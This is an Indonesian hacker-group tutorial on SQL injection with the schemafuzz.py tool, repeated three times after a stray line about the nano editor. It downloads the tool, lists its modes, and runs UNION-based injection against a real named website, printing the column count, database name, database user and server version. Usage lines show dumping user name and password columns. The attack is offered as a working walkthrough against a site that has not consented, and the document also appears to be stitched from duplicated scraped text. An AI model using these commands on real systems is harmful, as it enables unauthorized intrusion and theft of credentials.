Dengan memahami operasi-operasi dasar pada nano tersebut, nantinya rekan-rekan tidak akan bingung lagi jika mengedit atau membuat sebuah file teks di dalam sebuah Command Line Interface.

SQL Injection With Schemafuzz

SQL Injection With Schemafuzz
=========================================================
Welcome to my tutorial by arianom KiLL-9 CrEw
Powered by kill-9.tk
==================================================================
[+] Pertama Kali yang anda butuhkan untuk hacking dengan schemafuzz adalah sebuah sistem operasi Linux, atau account ssh.
Schemafuzz ini dijalankan menggunakan python.
1. login ke account ssh kmu atau masuk ke terminal jika menggunakan linux
2. wget schemafuzz.py : wget http://undana.ac.id/images/upload/schemafuzz.py
3. mv schemafuzz.py f >> untuk memperpendek cmd
4. python f -h >> mengetahui option cmd

> ketik python f -h
Usage: python f [options] arianom[@]gmail[dot]com kill-9.tk
Modes:
Define: --findcol Finds Columns length of a SQLi MySQL v4+
Define: --info Gets MySQL server configuration only. MySQL v4+
Define: --dbs Shows all databases user has access too. MySQL v5+
Define: --schema Enumerate Information_schema Database. MySQL v5+
Define: --full Enumerates all databases information_schema table MySQL v5+
Define: --dump Extract information from a Database, Table and Column. MySQL v4+
Define: --fuzz Fuzz Tables and Columns. MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump mode.

1. python f --findcol -u "www.site.com/news.php?id=22"
2. python f --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
3. python f --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
4. python f --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D c_db
5. python f --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D c_db -T user -C name,pass
6. python f --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt


[x] Penetrasi ke target. oke, kita cari target........
target di dapat : http://akperpasuruan.com/index.php?list=berita&de=14

1. langkah pertama --findcol [mencari panjang kolom]

[root@su110 tmp]# python f --findcol -u "http://akperpasuruan.com/index.php?list=berita&de=14"

|---------------------------------------------------------------|
| arianom[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: python f [options] |
| -h help kill-9.tk |
|---------------------------------------------------------------|

[+] URL: http://akperpasuruan.com/index.php?list=berita&de=14--
[+] Evasion Used: "+" "--"
[+] 16:55:12
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,1,2,3--
[+] darkc0de URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3
[-] Done!

2. langkah ke dua --info [melihat database]

[root@su110 tmp]# python f --info -u "http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3"

|---------------------------------------------------------------|
| arianom[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: python f [options] |
| -h help kill-9.tk |
|---------------------------------------------------------------|

[+] URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3--
[+] Evasion Used: "+" "--"
[+] 16:56:57
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: akperpas_db
User: akperpas_bagus@localhost
Version: 5.0.91-community

[+] Do we have Access to MySQL Database: No
[+] Do we have Access to Load_File: No

[-] 16:57:23
[-] Total URL Requests 3
[-] Done

Selengkapnya bisa di download disini
Request mas jhony utk tutorial schemafuzz

[x] Greats:
All KiLL-9 CrEw and IndonesianCoder Team, DarkCode, MC-CrEW , Magelang-Cyber CrEw, KPLI Kediri, JatimCom, and All Indonesian Hacker and You

SQL Injection With Schemafuzz

SQL Injection With Schemafuzz
=========================================================
Welcome to my tutorial by arianom KiLL-9 CrEw
Powered by kill-9.tk
==================================================================
[+] Pertama Kali yang anda butuhkan untuk hacking dengan schemafuzz adalah sebuah sistem operasi Linux, atau account ssh.
Schemafuzz ini dijalankan menggunakan python.
1. login ke account ssh kmu atau masuk ke terminal jika menggunakan linux
2. wget schemafuzz.py : wget http://undana.ac.id/images/upload/schemafuzz.py
3. mv schemafuzz.py f >> untuk memperpendek cmd
4. python f -h >> mengetahui option cmd

> ketik python f -h
Usage: python f [options] arianom[@]gmail[dot]com kill-9.tk
Modes:
Define: --findcol Finds Columns length of a SQLi MySQL v4+
Define: --info Gets MySQL server configuration only. MySQL v4+
Define: --dbs Shows all databases user has access too. MySQL v5+
Define: --schema Enumerate Information_schema Database. MySQL v5+
Define: --full Enumerates all databases information_schema table MySQL v5+
Define: --dump Extract information from a Database, Table and Column. MySQL v4+
Define: --fuzz Fuzz Tables and Columns. MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump mode.

1. python f --findcol -u "www.site.com/news.php?id=22"
2. python f --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
3. python f --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
4. python f --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D c_db
5. python f --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D c_db -T user -C name,pass
6. python f --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt


[x] Penetrasi ke target. oke, kita cari target........
target di dapat : http://akperpasuruan.com/index.php?list=berita&de=14

1. langkah pertama --findcol [mencari panjang kolom]

[root@su110 tmp]# python f --findcol -u "http://akperpasuruan.com/index.php?list=berita&de=14"

|---------------------------------------------------------------|
| arianom[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: python f [options] |
| -h help kill-9.tk |
|---------------------------------------------------------------|

[+] URL: http://akperpasuruan.com/index.php?list=berita&de=14--
[+] Evasion Used: "+" "--"
[+] 16:55:12
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,1,2,3--
[+] darkc0de URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3
[-] Done!

2. langkah ke dua --info [melihat database]

[root@su110 tmp]# python f --info -u "http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3"

|---------------------------------------------------------------|
| arianom[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: python f [options] |
| -h help kill-9.tk |
|---------------------------------------------------------------|

[+] URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3--
[+] Evasion Used: "+" "--"
[+] 16:56:57
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: akperpas_db
User: akperpas_bagus@localhost
Version: 5.0.91-community

[+] Do we have Access to MySQL Database: No
[+] Do we have Access to Load_File: No

[-] 16:57:23
[-] Total URL Requests 3
[-] Done

Selengkapnya bisa di download disini
Request mas jhony utk tutorial schemafuzz

[x] Greats:
All KiLL-9 CrEw and IndonesianCoder Team, DarkCode, MC-CrEW , Magelang-Cyber CrEw, KPLI Kediri, JatimCom, and All Indonesian Hacker and You

SQL Injection With Schemafuzz

SQL Injection With Schemafuzz
=========================================================
Welcome to my tutorial by arianom KiLL-9 CrEw
Powered by kill-9.tk
==================================================================
[+] Pertama Kali yang anda butuhkan untuk hacking dengan schemafuzz adalah sebuah sistem operasi Linux, atau account ssh.
Schemafuzz ini dijalankan menggunakan python.
1. login ke account ssh kmu atau masuk ke terminal jika menggunakan linux
2. wget schemafuzz.py : wget http://undana.ac.id/images/upload/schemafuzz.py
3. mv schemafuzz.py f >> untuk memperpendek cmd
4. python f -h >> mengetahui option cmd

> ketik python f -h
Usage: python f [options] arianom[@]gmail[dot]com kill-9.tk
Modes:
Define: --findcol Finds Columns length of a SQLi MySQL v4+
Define: --info Gets MySQL server configuration only. MySQL v4+
Define: --dbs Shows all databases user has access too. MySQL v5+
Define: --schema Enumerate Information_schema Database. MySQL v5+
Define: --full Enumerates all databases information_schema table MySQL v5+
Define: --dump Extract information from a Database, Table and Column. MySQL v4+
Define: --fuzz Fuzz Tables and Columns. MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump mode.

1. python f --findcol -u "www.site.com/news.php?id=22"
2. python f --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
3. python f --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
4. python f --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D c_db
5. python f --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D c_db -T user -C name,pass
6. python f --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt


[x] Penetrasi ke target. oke, kita cari target........
target di dapat : http://akperpasuruan.com/index.php?list=berita&de=14

1. langkah pertama --findcol [mencari panjang kolom]

[root@su110 tmp]# python f --findcol -u "http://akperpasuruan.com/index.php?list=berita&de=14"

|---------------------------------------------------------------|
| arianom[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: python f [options] |
| -h help kill-9.tk |
|---------------------------------------------------------------|

[+] URL: http://akperpasuruan.com/index.php?list=berita&de=14--
[+] Evasion Used: "+" "--"
[+] 16:55:12
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,1,2,3--
[+] darkc0de URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3
[-] Done!

2. langkah ke dua --info [melihat database]

[root@su110 tmp]# python f --info -u "http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3"

|---------------------------------------------------------------|
| arianom[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: python f [options] |
| -h help kill-9.tk |
|---------------------------------------------------------------|

[+] URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3--
[+] Evasion Used: "+" "--"
[+] 16:56:57
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: akperpas_db
User: akperpas_bagus@localhost
Version: 5.0.91-community

[+] Do we have Access to MySQL Database: No
[+] Do we have Access to Load_File: No

[-] 16:57:23
[-] Total URL Requests 3
[-] Done

Selengkapnya bisa di download disini
Request mas jhony utk tutorial schemafuzz

[x] Greats:
All KiLL-9 CrEw and IndonesianCoder Team, DarkCode, MC-CrEW , Magelang-Cyber CrEw, KPLI Kediri, JatimCom, and All Indonesian Hacker and You